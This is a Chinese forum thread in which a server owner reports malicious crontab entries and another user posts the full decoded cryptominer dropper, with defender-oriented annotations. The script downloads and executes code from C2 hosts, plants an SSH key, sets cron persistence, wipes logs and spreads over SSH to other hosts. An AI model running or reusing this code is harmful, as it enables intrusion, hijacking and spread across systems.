
大佬们好,今天发现服务器特别卡顿,发现这两句代码。请大佬教育教育这种坏人

b_d 发表于 2019-12-5 10:48
# Analyst note: the two crontab entries the poster found. Each one periodically
# fetches a script from a remote host and pipes it straight into a shell
# (download-and-execute), so the fetched script itself is never written to disk.
# First entry: every 30 minutes, curl with wget as fallback, run through bash.
*/30 * * * *    (curl -s http://122.51.164.83:7770/ash.sh||wget -q -O - http://122.51.164.83:7770/ash.sh)|bash -sh
##
# Second entry: every minute, output and errors discarded. Both hosts are
# indicators to search for in user crontabs, /etc/cron.d and shell history.
* * * * * wget -q -O - http://185.92.74.42/s.sh | sh > /dev/null 2>&1



JuncoJet 发表于 2019-12-5 11:12
楼主注意下 /root/.ssh/authorized_keys
JuncoJet 发表于 2019-12-5 11:05
解压出来的完整代码是这个
# --- Analyst annotation of the posted sample; code left byte-identical. ---
# Single-instance guard: bails out if the PID stored in the lock file is still
# alive. The lock file path /tmp/aslift.file is a host indicator for this sample.
LOCKFILE=/tmp/aslift.file
if [ -e ${LOCKFILE} ] && kill -0 `cat ${LOCKFILE}`; then
    echo "already running"
    exit
fi
# Lock file is removed on INT/TERM/EXIT, so it only exists while the script runs.
trap "rm -f ${LOCKFILE}; exit" INT TERM EXIT
echo $$ > ${LOCKFILE}
# Host fingerprinting; the output goes to stdout (i.e. back to whoever piped
# this script into bash).
uname -a
id
hostname
# Switches SELinux to permissive (requires root) and raises the open-file and
# process limits, presumably for the payload started later.
setenforce 0 2>/dev/null
ulimit -n 50000
ulimit -u 50000
# Paths/URLs used by the dropper. rtdir/rtdira/rtdirb are never referenced in
# the rest of the posted script; notls_x86 and notls_x86_64 point at the same
# "notls_x86" file, and notls_xxxx is also unused below.
rtdir="/etc/sysupdates"
rtdira="/etc/wgeta"
rtdirb="/etc/wgetb"
notls_x86="http://103.85.84.57:20331/notls_x86"
notls_x86_64="http://103.85.84.57:20331/notls_x86"
notls_xxxx="http://103.85.84.57:20331/Linux-syn25000"
# Removes the current user's crontab and every file under /var/spool/cron
# before installing its own entries further down.
crontab -r 2>/dev/null
rm -rf /var/spool/cron/* 2>/dev/null
mkdir -p /var/spool/cron/crontabs 2>/dev/null
# Overwrites (does not append to) root's authorized_keys with a single attacker
# key, giving persistent SSH access. Defenders: check /root/.ssh/authorized_keys
# for this key (comment "root@VM_0_14_centos") and restore legitimate keys.
mkdir -p /root/.ssh 2>/dev/null
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAtK7bwC0UwEw8Jq9YycNtQ+cfoIc2jlYLQMzoUSMM0Ck49I7+M9iAc1wpW8/qUWJPA79oXU8ko890PZcRemvgkiwOFtAtCMWO9o3ZSo0Kc23v1ZGte3z5emZLBJGV8uEENa01hq3fdvD5xF24N0Uaxia+9jrxeKVkBllrlmupPZoMwhBTx+if8N6Nrt69NF4kEZdr0mXv45HHwV2zoAXQ7yb6iEVtpme/x5V6trbd2nQRla3wO4iPcaHO7zFW4qOAo4nCPL7wyKGYrlFHdOYOGvQizqnlEldy7Uxb+R+CqEiJ2UN+1XW2iK2MRheQzMGC12ueX76XJ6aBJoqdWWG2uQ== root@VM_0_14_centos' > /root/.ssh/authorized_keys
# Kills competing cryptominers and other malware already on the host so this
# sample has the CPU to itself. Two patterns: "ps | grep <marker> | awk | xargs
# kill -9" keyed on mining-pool hostnames/ports and file paths, then a long
# list of "pkill -f <name fragment>". Several fragments mimic legitimate daemon
# names (irqbalance, polkitd, acpid, "systemctI" with a capital I), so pkill -f
# on them can also take down the real services - a visible side effect on an
# infected host. The list itself is a useful catalogue of names other
# miner families run under.
kill_miner_proc()
{
    # Match on pool hostnames/ports and known payload paths in the process list.
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
    # Jenkins-related: kills processes under var/lib/jenkins whose command line
    # contains "-c" (excluding the normal httpPort/headless invocations), and
    # anything whose command line looks like "./<digits> -c".
    ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
    ps ax|grep -o './[0-9]* -c'| xargs pkill -f
    # Kill by command-line fragment. minerd and polkitd each appear twice.
    pkill -f biosetjenkins
    pkill -f Loopback
    pkill -f apaceha
    pkill -f cryptonight
    pkill -f stratum
    pkill -f mixnerdx
    pkill -f performedl
    pkill -f JnKihGjn
    pkill -f irqba2anc1
    pkill -f irqba5xnc1
    pkill -f irqbnc1
    pkill -f ir29xc1
    pkill -f conns
    pkill -f irqbalance
    pkill -f crypto-pool
    pkill -f minexmr
    pkill -f XJnRj
    pkill -f mgwsl
    pkill -f pythno
    pkill -f jweri
    pkill -f lx26
    pkill -f NXLAi
    pkill -f BI5zj
    pkill -f askdljlqw
    pkill -f minerd
    pkill -f minergate
    pkill -f Guard.sh
    pkill -f ysaydh
    pkill -f bonns
    pkill -f donns
    pkill -f kxjd
    pkill -f Duck.sh
    pkill -f bonn.sh
    pkill -f conn.sh
    pkill -f kworker34
    pkill -f kw.sh
    pkill -f pro.sh
    pkill -f polkitd
    pkill -f acpid
    pkill -f icb5o
    pkill -f nopxi
    pkill -f irqbalanc1
    pkill -f minerd
    pkill -f i586
    pkill -f gddr
    pkill -f mstxmr
    pkill -f ddg.2011
    pkill -f wnTKYg
    pkill -f deamon
    pkill -f disk_genius
    pkill -f sourplum
    pkill -f polkitd
    pkill -f nanoWatch
    pkill -f zigw
    pkill -f devtool
    pkill -f systemctI
    pkill -f WmiPrwSe
}

# Downloader used to fetch the payload.
#   $1 - primary URL
#   $2 - destination file path
#   $3 - fallback URL (empty if the caller passes only two arguments)
# Prefers curl, then wget. The "cur" and "wge" branches test for binaries that
# do not normally exist, so they are effectively dead code on a real host.
downloads()
{
    if [ -f "/usr/bin/curl" ]
    then 
	echo $1,$2
        # HEAD-probe the primary URL first (10 s cap). Only 200 or 405 use the
        # primary URL; anything else - including "000" from a failed connection -
        # switches to the fallback $3. --retry 100 keeps this alive for a long
        # time if the server is down.
        http_code=`curl -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            curl --connect-timeout 10 --retry 100 $1 > $2
        else
            curl --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/cur" ]
    then
        # Spaces around "=" make this a command invocation, not an assignment;
        # the branch is unreachable anyway unless /usr/bin/cur exists.
        http_code = `cur -I -m 10 -o /dev/null -s -w %{http_code} $1`
        if [ "$http_code" -eq "200" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        elif [ "$http_code" -eq "405" ]
        then
            cur --connect-timeout 10 --retry 100 $1 > $2
        else
            cur --connect-timeout 10 --retry 100 $3 > $2
        fi
    elif [ -f "/usr/bin/wget" ]
    then
        # wget path: try the primary URL, fall back to $3 on any failure.
        wget --timeout=10 --tries=100 -O $2 $1
        if [ $? -ne 0 ]
	then
		wget --timeout=10 --tries=100 -O $2 $3
        fi
    elif [ -f "/usr/bin/wge" ]
    then
        # Same dead-branch situation; note the test here is -eq 0, the
        # opposite of the wget branch above.
        wge --timeout=10 --tries=100 -O $2 $1
        if [ $? -eq 0 ]
        then
            wge --timeout=10 --tries=100 -O $2 $3
        fi
    fi
}

# Kills processes the sample treats as competition while sparing its own
# payload. Two sweeps:
#   1. every process whose /proc/<pid>/exe target (from "ls -l") contains "/tmp";
#   2. every process at 40% CPU or more (per ps %cpu);
# in both cases a process is spared only if its cmdline contains
# "axlist"/"axlistc", the name the sample runs its own binary under.
# For defenders: legitimate high-CPU workloads getting SIGKILLed for no reason
# is one way this infection shows up before the miner itself is noticed.
kill_sus_proc()
{
    ps axf -o "pid"|while read procid
    do
            # "-ne 1" treats anything other than grep's "no match" as a hit.
            ls -l /proc/$procid/exe | grep /tmp
            if [ $? -ne 1 ]
            then
                    # grep -a because cmdline is NUL-separated binary data.
                    cat /proc/$procid/cmdline| grep -a -E "axlist|axlistc"
                    if [ $? -ne 0 ]
                    then
                            kill -9 $procid
                    else
                            echo "don't kill"
                    fi
            fi
    done
    # Second sweep: anything using >= 40% CPU that is not the sample's own payload.
    ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid
    do
            cat /proc/$procid/cmdline| grep -a -E "axlist|axlistc"
            if [ $? -ne 0 ]
            then
                    kill -9 $procid
            else
                    echo "don't kill"
            fi
    done
}

kill_miner_proc
kill_sus_proc


# Stage the payload: if no "axlist" process is running, download notls_x86 into
# a fresh mktemp directory (under $TMPDIR, /tmp by default), make it executable,
# start it detached with nohup, then set the immutable attribute (chattr +i) so
# a plain rm fails. Only two arguments are passed to downloads, so its fallback
# URL $3 is empty. Defenders: look for a process named axlist running from a
# temp directory; the file must be cleared with "chattr -i" before it can be
# removed.
ps -fe|grep axlist |grep -v grep
if [ $? -ne 0 ]; then
	DIR=$(mktemp -d)
	sleep 1s
	downloads $notls_x86 $DIR/axlist
	echo "not tmp runing"
	cd $DIR
	chmod 777 $DIR/axlist
	sleep 5s
	nohup $DIR/axlist &
	chmod 777 $DIR/axlist
	chattr +i $DIR/axlist
else
	echo "tmp runing....."
fi


# Uses netstat if it is installed, otherwise ss. "port" (number of sockets
# involving :6389) is computed but never referenced again in the posted script.
# Then enforces a single "axlist" instance: if more than one is running, every
# match after the first is killed.
NTOK=$(netstat --version 2>/dev/null|wc -l)
if [ ${NTOK} -eq 0 ]; then NETTOOL='ss '; else NETTOOL='netstat '; fi
port=$(${NETTOOL} -an 2>/dev/null| grep :6389 | wc -l)
self=$(ps aux|grep -v grep|grep -v defunct|grep "axlist"|wc -l)
if [ ${self} -gt 1 ]; then
	ps ax|grep -v grep|grep -v defunct|grep "axlist"|awk 'NR >= 2'| while read pid _; do kill -9 "$pid" >/dev/null 2>&1; done
fi

# Persistence. The same download-and-execute line is written, with different
# schedules, into /etc/cron.d (two files, run as root), root's crontab in both
# the RHEL-style (/var/spool/cron/root) and Debian-style
# (/var/spool/cron/crontabs/root) spool locations, plus an hourly script in
# /etc/cron.hourly. The "[url]...[/url]" wrappers are forum BBCode artefacts
# from the paste, not part of the original script.
# Indicators: /etc/cron.d/root, /etc/cron.d/apache, /var/spool/cron/root,
# /var/spool/cron/crontabs/root, /etc/cron.hourly/oanacroner1, and any cron
# line containing 122.51.164.83.
echo -e "*/10 * * * * root (curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /etc/cron.d/root
echo -e "*/20 * * * * root (curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /etc/cron.d/apache
echo -e "*/30 * * * *	(curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /var/spool/cron/root
mkdir -p /var/spool/cron/crontabs
echo -e "* * * * *	(curl -s [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O - [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh\n##" > /var/spool/cron/crontabs/root
mkdir -p /etc/cron.hourly
# Hourly dropper. The fallback after "||" has no command word in the paste
# (probably lost when the post was rendered), so only the curl path is intact.
(curl -fsSL --connect-timeout 120 [url]http://122.51.164.83:7770/11[/url] -o /etc/cron.hourly/oanacroner1||[url]http://122.51.164.83:7770/11[/url] -O /etc/cron.hourly/oanacroner1) && chmod 755 /etc/cron.hourly/oanacroner1
# Finally, unless the C2 address is already in root's crontab, wipe it and
# append a */15 entry through "crontab -", picking wget if available, else curl.
if crontab -l | grep -q "122.51.164.83"
then
    echo "Cron exists"
else
    crontab -r
    echo "Cron not found"
    LDR="wget -q -O -"
    if [ -s /usr/bin/curl ];
    then
        LDR="curl";
    fi
    if [ -s /usr/bin/wget ];
    then
        LDR="wget -q -O -";
    fi
	(crontab -l 2>/dev/null; echo "*/15 * * * * $LDR [url]http://122.51.164.83:7770/ash.sh[/url] | bash -sh > /dev/null 2>&1")| crontab -
fi
# Firewall tampering: flush every iptables rule and chain, then block outbound
# TCP to 3333/5555/7777/9999 (3333 and 7777 appear in the competitor pool list
# in kill_miner_proc) and all inbound traffic from 43.245.222.57.
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -I INPUT -s 43.245.222.57 -j DROP
service iptables reload
# One more sweep for "stratum" (miner protocol) processes.
ps auxf|grep -v grep|grep "stratum"|awk '{print $2}'|xargs kill -9
# Anti-forensics: clear the shell history and truncate root's mailbox, wtmp,
# secure and .bash_history. A zero-length /var/log/wtmp or /var/log/secure with
# a fresh mtime is itself a strong indicator of this step having run.
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
# Installs bash on yum/apt systems, presumably so the "| bash -sh" cron entries
# above work on hosts that only ship a minimal sh.
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
# Lateral movement over SSH. For root, and then for every account under /home,
# if the account has a key pair (id_rsa.pub present) extract every IPv4 address
# from its known_hosts and run the same curl|bash downloader on each host.
# BatchMode means only key-based auth is attempted (no password prompt), the
# remote command is backgrounded with "&" and each ssh runs in the background
# as well, so the whole sweep completes quickly. The root block is repeated
# verbatim. Defenders: every host named in the known_hosts files of an infected
# machine should be checked for the same indicators (authorized_keys entry,
# cron files, an axlist process).
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O- [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh >/dev/null 2>&1 &' & done
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O- [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh >/dev/null 2>&1 &' & done
fi
# Same sweep for each home directory (only directories are considered).
for file in /home/*
do
    if test -d $file
    then
        if [ -f $file/.ssh/known_hosts ] && [ -f $file/.ssh/id_rsa.pub ]; then
            for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" $file/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL [url]http://122.51.164.83:7770/ash.sh[/url]||wget -q -O- [url]http://122.51.164.83:7770/ash.sh[/url])|bash -sh >/dev/null 2>&1 &' & done
        fi
    fi
done
# Second stage: fetch and run bsh.sh from the same C2 host; its contents are
# not included in this post.
bash -c 'curl -fsSL 122.51.164.83:7770/bsh.sh|bash' 2>/dev/null


潇湘公子 发表于 2019-12-5 10:55
zwqlon1978 发表于 2019-12-5 10:56
小白路过看不懂
JuncoJet 发表于 2019-12-5 11:03
好像是个gzip的压缩包吧
fjf3997 发表于 2019-12-5 11:07
看不懂耶~~~~
 楼主| b_d 发表于 2019-12-5 11:11
潇湘公子 发表于 2019-12-5 10:55
腾讯云前不久也在不断提示我,我看服务器也有类似的情况,腾讯云很多都被爆了吗……

最好还是定期检查下服务器。
 楼主| b_d 发表于 2019-12-5 11:11

俺也一样
RemMai 发表于 2019-12-5 11:14
服务器被植入了挖矿代码.
xmr.crypto-pool.fr:7777 进入并且翻译,就知道了....